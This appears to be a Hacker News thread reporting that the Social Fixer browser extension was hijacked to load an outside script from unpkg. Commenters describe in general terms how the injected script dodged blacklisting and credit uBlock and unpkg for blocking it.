
Social Fixer extension hacked (192k users affected) - joshschreuder
https://www.facebook.com/socialfixer/posts/10155109803749342
======
joshschreuder
It looks like a script was added (insertion.js) that inserts a script from
[https://unpkg.com](https://unpkg.com).

[https://pastebin.com/q9xT21Xr](https://pastebin.com/q9xT21Xr)

The script seems to be blacklisted currently, but the new code has a changing
hash based on time since install which I think allows the hack to continue
working after it has been blacklisted.

I am hoping I am safe as uBlock caught the script before it could be executed
due to it coming from 3rd party domain.

[https://i.imgur.com/0lck7mG.png](https://i.imgur.com/0lck7mG.png)

~~~
joshschreuder
Well done to unpkg for being quick to block the malicious packages:

[https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...](https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b909a63546f9773ca9aeb837)

